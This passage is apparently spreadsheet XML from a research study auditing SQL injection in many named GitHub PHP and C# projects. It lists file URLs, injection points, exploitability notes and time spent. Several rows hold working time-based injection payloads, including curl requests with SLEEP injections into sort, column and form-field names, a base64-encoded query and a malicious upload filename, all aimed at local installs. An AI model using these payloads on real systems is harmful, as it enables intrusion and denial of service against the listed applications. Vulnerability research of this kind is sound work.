    <t>curl 'http://localhost/PraktikumWebC/FINAL%20PROJECT/homemhs.php' -H "Cookie: PHPSESSID=32gs59nop6c79c4dmk7c3qtilo; TawkConnectionTime=1689232165430; twk_idm_key=YrkdKscaAXXEMKQ9MM-4B; twk_uuid_5f7ec3124704467e89f5a670=%7B%22uuid%22%3A%221.HPxx7A54KsZ6rHZFfnX95Hu5sSbU2HiiLKWQ0pVSZS676N2QWOPdvpt0tSwtcBl8l5mxU5UTNGN5UpKMEt1iaFTbJ0mV7avAm2qVZ%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1689232132922%7D" -X POST -F "submitdaftarmhs=a" -F "cari=b" -F "filter=SLEEP(1000)" -F "sort=, (SELECT SLEEP(1000))"</t>
  </si>
  <si>
    <t>Vulnerable to lots</t>
  </si>
  <si>
    <t>https://github.com/vielhuber/magicreplace/raw/5c8574875936265aec7813f85e4ac4fd8dce16de/tests/tools/interconnect-search-replace/4.1.1/srdb.class.php</t>
  </si>
  <si>
    <t>The program correctly verifies them before using</t>
  </si>
  <si>
    <t>https://github.com/Magui-28-Magui/tracker/raw/aad36a7910cc5cd791181a80e5ee6f48b7b52867/action-item-list/functions/functions.php</t>
  </si>
  <si>
    <t>curl 'http://localhost/tracker/action-item-list/functions/functions.php?function=view_category' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Connection: keep-alive' -H 'Cookie: twk_uuid_5f7ec3124704467e89f5a670=%7B%22uuid%22%3A%221.HPxx7A54KsZ6rHZFfnX95Hu5sSbU2HiiLKWQ0pVSZS676N2QWOPdvpt0tSwtcBl8l5mxU5UTNGN5UpKMEt1iaFTbJ0mV7avAm2qVZ%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1689232132922%7D; PHPSESSID=32gs59nop6c79c4dmk7c3qtilo; TawkConnectionTime=1689232165430; twk_idm_key=YrkdKscaAXXEMKQ9MM-4B' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' -H 'Origin: http://localhost' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'order[0][column]=0&amp;columns[0][data]=(SELECT SLEEP(10000)) -- '</t>
  </si>
  <si>
    <t>https://github.com/hogiro/cm/raw/5f0a3c5ccf99199773eb13fde623bc94a9093e58/api/lib/pear/DB/mysqli.php</t>
  </si>
  <si>
    <t xml:space="preserve">localhost/cm/data.php?sort=(SELECT SLEEP(10000)) --  </t>
  </si>
  <si>
    <t xml:space="preserve">Uses PHP 5.6; DB would not connect due new DB password reqs, but printing the query passed to execute clearly shows the injection and is a valid command when run in Workbench.  New note: I think I figured out a fix for this later; could retry now. </t>
  </si>
  <si>
    <t>https://github.com/thaian229/Web-Programming/raw/7996e60337c832323735cd53feaa06efca4248b6/lab08/exercise/part2/library/sqlquery.class.php</t>
  </si>
  <si>
    <t>https://github.com/kenmush/movrev/raw/08fb43d3e6996c15b56aaca180eec7f9a37c974d/includes/function.php</t>
  </si>
  <si>
    <t>Insert/Update table names</t>
  </si>
  <si>
    <t>https://github.com/avshatalov48/geekbrains/raw/e95fb1dd4ea802fa918dadf130760be6ea09de1e/php-1/hometask-5/engine/counters.php</t>
  </si>
  <si>
    <t>Column Name, Update</t>
  </si>
  <si>
    <t>Vulnerable to SQLIA, upload image with name of         ', SLEEP(1000), 0) -- .jpg</t>
  </si>
  <si>
    <t>https://github.com/raystonge/tracker/raw/45022498d31c45b632fa0b1c3a91b6b79142dbe3/public_html/include/tracker/organization.php</t>
  </si>
  <si>
    <t>Order by</t>
  </si>
  <si>
    <t>https://github.com/JoaoCFN/Signatura/raw/980028d696591097c335c049b5e5107e4467cdd6/libs/Conn.class.php</t>
  </si>
  <si>
    <t>Insert Columns</t>
  </si>
  <si>
    <t>curl 'http://localhost/Signatura/admin/control/projeto.control.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Referer: http://localhost/Signatura/admin/adc_proj.php' -H 'Origin: http://localhost' -H 'Connection: keep-alive' -H 'Cookie: twk_uuid_5f7ec3124704467e89f5a670=%7B%22uuid%22%3A%221.HPxx7A54KsZ6rHZFfnX95Hu5sSbU2HiiLKWQ0pVSZS676N2QWOPdvpt0tSwtcBl8l5mxU5UTNGN5UpKMEt1iaFTbJ0mV7avAm2qVZ%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1689232132922%7D; PHPSESSID=32gs59nop6c79c4dmk7c3qtilo; TawkConnectionTime=1689232165430; twk_idm_key=YrkdKscaAXXEMKQ9MM-4B' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' -H 'Content-Type: multipart/form-data; boundary=---------------------------1628464597969214704376758066' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-binary $'-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="tumb"; filename="1x1_#88B6E5FF.png"\nContent-Type: image/png\n\n\x89PNG\n\x1a\n\x00\x00\x00\nIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\nIDAT\x08[c\xe8\xd8\xf6\xf4?\x00\x07\x10\x03#Cc2\x0f\x00\x00\x00\x00IEND\xaeB`\x82\n\r\n\r\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="nome`)VALUES(SLEEP(1000))#"\n\na\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="img_top"; filename="1x1_#88B6E5FF.png"\nContent-Type: image/png\n\n\x89PNG\n\x1a\n\x00\x00\x00\nIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\nIDAT\x08[c\xe8\xd8\xf6\xf4?\x00\x07\x10\x03#Cc2\x0f\x00\x00\x00\x00IEND\xaeB`\x82\n\r\n\r\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="nome"\n\nb\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="classf"\n\nweb\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="destaque"\n\n100\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="tipo"\n\nd\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="ano"\n\ne\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="tags"\n\nf\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="titulo_top"\n\ng\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="descricao"\n\nh\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="img_telas"; filename="1x1_#88B6E5FF.png"\nContent-Type: image/png\n\n\x89PNG\n\x1a\n\x00\x00\x00\nIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\nIDAT\x08[c\xe8\xd8\xf6\xf4?\x00\x07\x10\x03#Cc2\x0f\x00\x00\x00\x00IEND\xaeB`\x82\n\r\n\r\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="img_mobile"; filename="1x1_#88B6E5FF.png"\nContent-Type: image/png\n\n\x89PNG\n\x1a\n\x00\x00\x00\nIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\nIDAT\x08[c\xe8\xd8\xf6\xf4?\x00\x07\x10\x03#Cc2\x0f\x00\x00\x00\x00IEND\xaeB`\x82\n\r\n\r\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="descricao_mid"\n\ni\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="img_mid"; filename="1x1_#88B6E5FF.png"\nContent-Type: image/png\n\n\x89PNG\n\x1a\n\x00\x00\x00\nIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\nIDAT\x08[c\xe8\xd8\xf6\xf4?\x00\x07\x10\x03#Cc2\x0f\x00\x00\x00\x00IEND\xaeB`\x82\n\r\n\r\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="titulo_bot"\n\nj\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="descricao_bot"\n\nk\n-----------------------------1628464597969214704376758066\nContent-Disposition: form-data; name="img_bot"; filename="1x1_#88B6E5FF.png"\nContent-Type: image/png\n\n\x89PNG\n\x1a\n\x00\x00\x00\nIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\nIDAT\x08[c\xe8\xd8\xf6\xf4?\x00\x07\x10\x03#Cc2\x0f\x00\x00\x00\x00IEND\xaeB`\x82\n\r\n\r\n-----------------------------1628464597969214704376758066--\r\n'</t>
  </si>
  <si>
    <t>Validates values, not keys</t>
  </si>
  <si>
    <t>https://github.com/ekowamoonu/ledgerpro/raw/7acc4149b6d9d8e739236c3d5eb09f6810b1cea1/classes/querying_class.php</t>
  </si>
  <si>
    <t>8 and more</t>
  </si>
  <si>
    <t>https://github.com/Nasim992/IUBAT_JOURNAL_2/raw/94306ece1585261594335750715cbeeaa993203f/link/functions.php</t>
  </si>
  <si>
    <t>No, curl is for a SQLIA</t>
  </si>
  <si>
    <t>curl 'http://localhost/IUBAT_JOURNAL_2/link/login.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Connection: keep-alive' -H 'Cookie: twk_uuid_5f7ec3124704467e89f5a670=%7B%22uuid%22%3A%221.HPxx7A54KsZ6rHZFfnX95Hu5sSbU2HiiLKWQ0pVSZS676N2QWOPdvpt0tSwtcBl8l5mxU5UTNGN5UpKMEt1iaFTbJ0mV7avAm2qVZ%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1689232132922%7D; PHPSESSID=32gs59nop6c79c4dmk7c3qtilo; TawkConnectionTime=1689232165430; twk_idm_key=YrkdKscaAXXEMKQ9MM-4B' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://localhost' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw $'sign-up=1&amp;pemail=\' or SLEEP(10000) = 1 -- '</t>
  </si>
  <si>
    <t>Vulnerable to SQLIA, not IDIA; appears to be a real journal site. Only one location is vulnerable; others all use escaping or prep statements correctly</t>
  </si>
  <si>
    <t>https://github.com/saurabh-agarwal10/fys/raw/059229480082568ace6d7dffd46b1130119eff8c/marks_entry_old2.php</t>
  </si>
  <si>
    <t>http://localhost/fys/marks_entry_old2.php?year=KFNFTEVDVCBTTEVFUCgxMDApIGFzIG5hbWUsIDEgYXMgc21vYiwgMSBhcyBwbW9iKSBhcyB0IC0tICA=</t>
  </si>
  <si>
    <t>Base64 encoded</t>
  </si>
  <si>
    <t>https://github.com/kagaminejin/Hina/raw/8e4433e339cb5228dc9e84c87a76db1eefa10baa/rank.php</t>
  </si>
  <si>
    <t>https://github.com/dodoas/lodo/raw/1333ba3404b2e60cfd4862ad6b8f07dc8e1b15a1/code/lib/db/db_mysqli.class.php</t>
  </si>
  <si>
    <t>Dynamic Allow List</t>
  </si>
  <si>
    <t>https://github.com/Mustafaozver/WSS/raw/ffc8f6dad0d45deae8bbb41f72bd592cc6828dd2/XO/database.php</t>
  </si>
  <si>
    <t>Table Name and Column Name</t>
  </si>
  <si>
    <t>curl 'http://localhost/WSS/index.php/api/0/users' -X POST -F "ID)/**/SELECT/**/SLEEP(1000)#=exploited" -F "Method=POST"</t>
  </si>
  <si>
    <t>This has two vulns! Interesting spacing needs here. Also not found by sqlmap. Don't need to rely on /**/, though, see below
curl 'http://localhost/WSS/index.php/api/0/users' -X POST -d "ID,Name)SELECT'1',SLEEP(1000)#=exploited"</t>
  </si>
  <si>
    <t>https://github.com/ErickBris/advanced-social-network_v1.0/raw/f01d19a61becc382680bb88df0b512e7b60b8894/SocNetwork/Project%20Files/WebBackend/core/classes/Database.php</t>
  </si>
  <si>
    <t>Vulnerable to SQLIA due to missing safeguard in one install file</t>
  </si>
  <si>
    <t>https://github.com/Tent-Dev/Hotel-system/raw/b96611ab2140e67cc1c2ed7c1d1557553cc23feb/system/class_db.php</t>
  </si>
  <si>
    <t>Table name and Column Names</t>
  </si>
  <si>
    <t>https://github.com/motiejus1/15-paskaita-PHP-05.31/raw/f876fd5e947633874c778ecd4b27754f60683f29/.history/clients_20210902191143.php</t>
  </si>
  <si>
    <t>Order By</t>
  </si>
  <si>
    <t>http://localhost/15-paskaita-PHP-05.31/clients.php?rikiavimas_id=,%20SLEEP(1000)</t>
  </si>
  <si>
    <t>Vulnerable to others, used the non-history version of the file</t>
  </si>
  <si>
    <t>https://github.com/s-m-r-z/SocietyManagementSystem/raw/f9d642952ed9588dd2f6a9eee5b7d5db5a4d4f50/admin/includes/loadInfo/manage_security.php</t>
  </si>
  <si>
    <t>curl 'http://localhost/SocietyManagementSystem/admin/includes/loadInfo/manage_security.php' -H "" -X POST -F "order[0][column]=0" -F "columns[0][data]=SLEEP(1000) -- " -F "order[0][dir]= "</t>
  </si>
  <si>
    <t>https://github.com/nishangsys/Jungle/raw/842927e8eeeb8e2857dc1a7ebd66164dd25c7057/POS/cash/fetchs.php</t>
  </si>
  <si>
    <t>curl 'http://localhost/Jungle/POS/cash/fetchs.php' -H "" -X POST -F "order[0][column]=0" -F "order[0][dir]=, SLEEP(1000) -- "</t>
  </si>
  <si>
    <t>https://github.com/bhagam19/inventarioApp/raw/5c24872b33e6c6e85c104782694693e20c176e96/bdBienes/01.02-cargarConsultaInicial.php</t>
  </si>
  <si>
    <t>http://localhost/inventarioApp/bdBienes/01.00-cargarArchivos.php?o=SLEEP(1000)%20--</t>
  </si>
  <si>
    <t>These are SQLIAs only, NOT RELEVANT</t>
  </si>
  <si>
    <t>https://github.com/annaelvira24/IF3110-willy-wangkys-web/raw/91b2608f1120b5bb1a9b9c29aac26949ff84d073/php/search_result.php</t>
  </si>
  <si>
    <t>LIKE</t>
  </si>
  <si>
    <t xml:space="preserve">Use the following in search tab         ' AND SLEEP(10000) -- </t>
  </si>
  <si>
    <t>https://github.com/Shivam010/Question-Answer-Platform/raw/21bf723a22606e70449eef3d8fc1682a423d596f/categories.php</t>
  </si>
  <si>
    <t>Into Like</t>
  </si>
  <si>
    <t>Post variable answer</t>
  </si>
  <si>
    <t>https://github.com/SowkatAlam/Location-Based-restaurant-finder-and-Rating-System/raw/95b259b8560c0714740e45cc5c5e4df67f868d07/res_registration.php</t>
  </si>
  <si>
    <t>Data directly from post</t>
  </si>
  <si>
    <t>Three using new definition</t>
  </si>
  <si>
    <t>File ID</t>
  </si>
  <si>
    <t>Author Skill level</t>
  </si>
  <si>
    <t>Exploitability Confidence</t>
  </si>
  <si>
    <t>Column1</t>
  </si>
  <si>
    <t>Column2</t>
  </si>
  <si>
    <t>https://raw.githubusercontent.com/NishiokaTakeo/spider-spiderdocs/77485a3e240981b502913775768d875f2c2bb76a/WebSpiderDocs/Helpers/Customs/DaoBase.cs</t>
  </si>
  <si>
    <t>web application</t>
  </si>
  <si>
    <t>professional</t>
  </si>
  <si>
    <t>4 h</t>
  </si>
  <si>
    <t>error msg: HTTP Error 500.19 - Internal Server Error /0x80070003</t>
  </si>
  <si>
    <t>https://github.com/mwilian/demos/raw/3ea0318dedb13536024314207812ee1b4e900f34/DAO/POGDataAccess.cs</t>
  </si>
  <si>
    <t>Standalone app</t>
  </si>
  <si>
    <t xml:space="preserve">no </t>
  </si>
  <si>
    <t>did not installed</t>
  </si>
  <si>
    <t>2 H</t>
  </si>
  <si>
    <t>vulnerability is in search method.
 I found 2 .resx file, FORM_QD.resx and FunctionNames.resx with search keyword.
 I could not set up the project and exploit it.
(99% C#) stand alone</t>
  </si>
  <si>
    <t>https://github.com/iEricZHENG/KiwiCrawler.CASM/raw/6729717bc943b4f23a2be1fad44e85946aef5644/DBUtility/DbHelperOra.cs</t>
  </si>
  <si>
    <t>select max ( + colname)</t>
  </si>
  <si>
    <t>no</t>
  </si>
  <si>
    <t>dead code</t>
  </si>
  <si>
    <t>20 min</t>
  </si>
  <si>
    <t>hard code.  public int GetMaxId()
        {
            return DbHelperMySQL.GetMaxID("kId", "urlconfigs_k");
        } public static int GetMaxID(string FieldName, string TableName)
        {
            string strsql = "select max(" + FieldName + ")+1 from " + TableName;</t>
  </si>
  <si>
    <t>https://github.com/krishnaMoulicgs/Sewbie_BugFixing/raw/1b629f15b9520318162f1b977c451a10e20a5aa3/Libraries/Nop.BusinessLogic/ExportImport/ExcelHelper.cs</t>
  </si>
  <si>
    <t>99, 105, 135, 191, 200, 216</t>
  </si>
  <si>
    <t xml:space="preserve">where + condition
from+tablename(str.format)
Drop+ table(str.format)
create+table(appendFormat) {+key}
insert </t>
  </si>
  <si>
    <t>hard coded/ dead code</t>
  </si>
  <si>
    <t>99: hardcoded (line 80)
105: hardcoded(importManger.cs-&gt; 221
135: dead code
191: hardcoded(ExportManger_&gt;  writeTable)
200: key, value
216:dead code(GenerateInsertStatement -&gt;AddNewRow(no ref) )
web application(web.config)</t>
  </si>
  <si>
    <t>https://github.com/blacklensama/1709/raw/4b471d3ecc7faad8d5b17b715dddc393083c5955/2013-04-01/csExWB/csExWB/DataBase.cs</t>
  </si>
  <si>
    <t xml:space="preserve">professional
</t>
  </si>
  <si>
    <t>select + col 
where + condition</t>
  </si>
  <si>
    <t>3 hrs</t>
  </si>
  <si>
    <t xml:space="preserve">220: IHTMLElement.getAttribute
</t>
  </si>
  <si>
    <t xml:space="preserve">System.IO.FileNotFoundException:
 'Could not load file or assembly 'System.
Windows.Forms, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=b77a5c561934e089' or one of its dependencies.
 The system cannot find the file specified.'
windows application(windows forms)
create a few win app forms with html
System.Windows.Forms windows application
</t>
  </si>
  <si>
    <t>libarary/Framework</t>
  </si>
  <si>
    <t>201, 280</t>
  </si>
  <si>
    <t>string.Format</t>
  </si>
  <si>
    <t>280: (CreateCommandDescriptor) not call
201: (QueryTableSchema) -&gt;QuerySchema-&gt; QueryParameters</t>
  </si>
  <si>
    <t>https://github.com/caixianqi/RLMedicine/raw/7f93c98654d2708da0d8cf1af7d3ae80c0fd1040/%E6%97%A5%E7%AB%8B%E5%8C%BB%E7%96%97%E7%A8%8B%E5%BA%8F/Backup1/Source/IImportData/DataAcc.cs</t>
  </si>
  <si>
    <t>898, 922, 956,</t>
  </si>
  <si>
    <t>maxBill, maxBillIIP never been called.
96% C#
web application( run in browser)</t>
  </si>
  <si>
    <t>https://github.com/NguyenDuyCuong/EFormSystem/raw/5144d60a3e4b7012452d67177175e5edd6653c8c/02.Reference/AlbumViewerVNext-master/src/AlbumViewerBusiness/Westwind.BusinessObjects/Utilities/DataAccessBase.cs</t>
  </si>
  <si>
    <t>1181, 1271, 1300.
1338, 1365
1470, 1405</t>
  </si>
  <si>
    <t>(GetEntity) (UpdateEntity)no fuction called
web application(web.config)</t>
  </si>
  <si>
    <t>https://github.com/kartyeks/Billing/raw/66a4e770ca3df5bd75e1669b83b596f35d627106/HRManager/ExtendedBusinessObjects/Recruitment/Master_CandidateBusinessObject.cs</t>
  </si>
  <si>
    <t xml:space="preserve">24, 81, 137, </t>
  </si>
  <si>
    <t>I is potential (SQLIA)</t>
  </si>
  <si>
    <r>
      <t>I have errors in set up.</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Could not load file An error occurred during the processing of a configuration file required to service this reques or assembly 'System.Windows.Forms, Version=4.0.0.0, Culture=neutral,.</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>..</t>
    </r>
  </si>
  <si>
    <t>8 hrs</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>(line 24:in method name: GetAllCandidateDetails) not called!
81(SQLIA): GetCandidatesBasedOnLogin-&gt;GetAllCandidateData-&gt;GetCandidateListGrid-&gt; GetCandidateDetailsGrid -&gt; ProcessRequest
137 (SQLIA):IsLoggedEmpCandidateManager-&gt; CheckIsLoggedEmpCandidateManager-&gt;.ProcessRequest(</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>RequestCommand</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
      </rPr>
      <t xml:space="preserve">, RequestData));
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
      </rPr>
      <t xml:space="preserve"> String RequestCommand = context.Request.Form["RequestCommand"];
RequestCommand.-&gt; webutility.js(SendApplicationRequest)
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0070C0"/>
        <rFont val="Calibri"/>
      </rPr>
      <t xml:space="preserve"> $.ajax
        (
            {
                type: 'POST',
                url: RequestPage,
                data: 'RequestCommand=' + escape(Command) + '&amp;RequestData=' + escape(RequestData) +
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
      </rPr>
      <t>web application(web.config, aspx, run in browser)</t>
    </r>
  </si>
  <si>
    <t>https://github.com/Tharnid/Chazwa/raw/f9eb72c9a86506364a0467d8f7674a4a0614617d/BootstrapEx/SamplesData/ProductClasses/ProductManager.cs</t>
  </si>
  <si>
    <t>21, 82, 158</t>
  </si>
  <si>
    <t xml:space="preserve">Get all Products from Product table </t>
  </si>
  <si>
    <t>40 mins</t>
  </si>
  <si>
    <t>web application(web.config)</t>
  </si>
  <si>
    <t>https://github.com/zoomla/CMS-Source-code/raw/058828244ff1753f5a74a81432e41ce53234cd63/Zoomla%E9%80%90%E6%B5%AACMS2_x3.9%E6%BA%90%E7%A0%81-mvc/ZoomLa.BLL/Other/B_GradeOption.cs</t>
  </si>
  <si>
    <t xml:space="preserve">96, 138, </t>
  </si>
  <si>
    <t>hard coded</t>
  </si>
  <si>
    <t>30 mins</t>
  </si>
  <si>
    <t>web application(web.config, run in browser, .aspx, .html)</t>
  </si>
  <si>
    <t>https://github.com/blackkingtht/war/raw/b6767d94f756568ebe9ea6dd56e08b778c57c9b4/War/server/server/DBModel/AbstractSQLDBModel.cs</t>
  </si>
  <si>
    <t>80, 84, 132, 136,
 198, 202, 260</t>
  </si>
  <si>
    <t>100% C#</t>
  </si>
  <si>
    <t>https://github.com/jorik041/osmsharp/raw/cb30ff535717fce3fef5d7f19d0e36a24137d8bc/Data/Oracle/OsmSharp.Osm.Data.Oracle/SimpleSchema/Processor/ChangeSets/OracleSimpleChangeSetApplyTarget.cs</t>
  </si>
  <si>
    <t>503, 529, 563, 574, 822</t>
  </si>
  <si>
    <t>Oracle with a different syntax for parameters than
 Sql-Server.  Using : for vars</t>
  </si>
  <si>
    <t>https://github.com/joethinh/nohros-must/raw/8d96144c969ff8f59d4f7c20eda1b4fc3fb1b22b/src/impl/providers/sqlce/queries/AddStateQuery.cs</t>
  </si>
  <si>
    <t>libarary</t>
  </si>
  <si>
    <t>no refrences to Method "Execute" in the class "AddStateQuery"</t>
  </si>
  <si>
    <t>it is not called</t>
  </si>
  <si>
    <t>https://github.com/TheBigBang2/GroupProject223/raw/d8b98322dc35a1da43ff7ae7244064451cfed4db/GroupProject223/MaintainBooking.cs</t>
  </si>
  <si>
    <t>like</t>
  </si>
  <si>
    <t>The text associated with Gets or sets property
it is win app: 1. there is form.cs. 2. in property, output type
is windows app
windows application</t>
  </si>
  <si>
    <t>https://github.com/arqum123/_HRM/raw/afc0b3eb5683137a6b6fa716f66e09e2c2e0568b/HRM.Repository/UserTypeRepository.base.cs</t>
  </si>
  <si>
    <t>111, 122,123,132, 165, 168, 171, 182
202</t>
  </si>
  <si>
    <t>111: string.Format(Select {0} ",SelectClause)
123: where col.
171: order by</t>
  </si>
  <si>
    <t>111, 122, 132, 182: no(set input as parameter =null ). 123, 171: (no func call).
Vulnerability is under HRM.Repository which is library. In the repository HRM.API is web app</t>
  </si>
  <si>
    <t>https://github.com/joeywda/Srvtools/raw/e1e7fb954894d78772bfb4aa1aec53d51a3b0aba/LogSQLBuilder.cs</t>
  </si>
  <si>
    <t>class library</t>
  </si>
  <si>
    <t>135, 526</t>
  </si>
  <si>
    <t>insert into " + LogTableName
select * from " + Quote(tableName)</t>
  </si>
  <si>
    <t xml:space="preserve">99% C#. Not Web app
</t>
  </si>
  <si>
    <t>135: hardcoded</t>
  </si>
  <si>
    <t>https://github.com/sajjucode/programmermate/raw/668733b2b3e9cb3164674c86d18ccdffc5fb6563/Pss.ProgrammerMate.DAL/ProjectMethodsDAL.cs</t>
  </si>
  <si>
    <t>329, 346</t>
  </si>
  <si>
    <t>order by</t>
  </si>
  <si>
    <t>10 mins</t>
  </si>
  <si>
    <t>Description:Programmer mate is a desktop application to help programmer to create auto Store Procedures, Projects , Business Entity , Data Access and Web API in c#.
Desktop application</t>
  </si>
  <si>
    <t>https://github.com/vikiii22/DesarrolloInterfaces/raw/95dd0bc80338b17bb4a1885c2fe2bbb9e3ba7f9f/WPF/EjerciciosWPF/proyectoFinal/proyectoFinal/proyectoFinal/winLibroLibreria.xaml.cs</t>
  </si>
  <si>
    <t>wpf</t>
  </si>
  <si>
    <t>120, 151, 167</t>
  </si>
  <si>
    <t>120: from + tablename
151:  from + tablename, where + col,
167:Select + colname, from+ tablename</t>
  </si>
  <si>
    <t>no function call
wpf(sys.net.http, xaml)
no refrence/ call</t>
  </si>
  <si>
    <t>https://github.com/brendachongg/ACI/raw/d26a77c53fd50f2b3888e78bec7091d141a7ad6f/ACITMS/ACI_TMS/App_Data/Data/DB_Batch_Session.cs</t>
  </si>
  <si>
    <t>237, 274, 296, 324,413, 919</t>
  </si>
  <si>
    <t xml:space="preserve">237, 324, 919: where + condition
274, 296: join = col  </t>
  </si>
  <si>
    <t>237: hardcoded.
274, 296: set , get property(fill from db)
324, 413, 919: hardcoded.</t>
  </si>
  <si>
    <t>https://github.com/liankong110/VAN_OA/raw/53b27cc0aa13b99dc16390b6ded2d24f91ed4050/FLY/Dal/JXC/CAI_OrderOutHousesService.cs</t>
  </si>
  <si>
    <t>383, 433</t>
  </si>
  <si>
    <t>where + condition</t>
  </si>
  <si>
    <t>https://github.com/SoftSuite/SHND/raw/9811de3acd382d2e9c9981cc0587c174fa56658f/DAL/Views/VMaterialNutrientDAL.cs</t>
  </si>
  <si>
    <t>142, 164, 214</t>
  </si>
  <si>
    <t xml:space="preserve">from + tablename
where + condition
order by </t>
  </si>
  <si>
    <t>142: hardcoded
164 : 0 refrences
214: -&gt; GetDataListByMaterialMaster-&gt; GetMaterialNutrient</t>
  </si>
  <si>
    <t>https://github.com/tracyacai/sharpmap/raw/751bb02054c3e4d945a6d24dad025dcd9ca7a1e4/SharpMap/Data/Providers/MsSql.cs</t>
  </si>
  <si>
    <t>179, 180, 181, 183, 216, 217, 245,246,248, 292, 294, 329, 378, 411, 412, 416, 549
542, 553, 555, 570, 574
616</t>
  </si>
  <si>
    <t>select + col 
FROM + table
where + condition,
create + tablename
insert + table name
create index on + tablename</t>
  </si>
  <si>
    <t>40% on line 181</t>
  </si>
  <si>
    <t>120+</t>
  </si>
  <si>
    <t>170, 180, 181, 183, 216, 245, 246, 292, 294, 329, 330, 378, 411, 412: set, get property
181, 413: GML.js( envelop (set, get))
View to render
217: dead code
248: 
549: dead code
Class library. no html.
error while try running:
" a project with type of class library cannot be started directly '</t>
  </si>
  <si>
    <t>https://github.com/16it/sharpmap/raw/8cd83f89b85c028ba14f8adfbd304dfd1f36e4f0/Branches/Trunk-Benjii/SharpMap.Extensions/Data/Providers/SqlLite.cs</t>
  </si>
  <si>
    <t>100, 101, 132, 133, 138, 165, 193, 194, 195, 198, 235, 237, 252, 253, 294, 296, 428, 435, 461</t>
  </si>
  <si>
    <t>select + col 
FROM + table
where + condition,
create + table
insert + table
Drop + table</t>
  </si>
  <si>
    <t>hardcoded/ dead code</t>
  </si>
  <si>
    <t>5% (big project. I might miss st)</t>
  </si>
  <si>
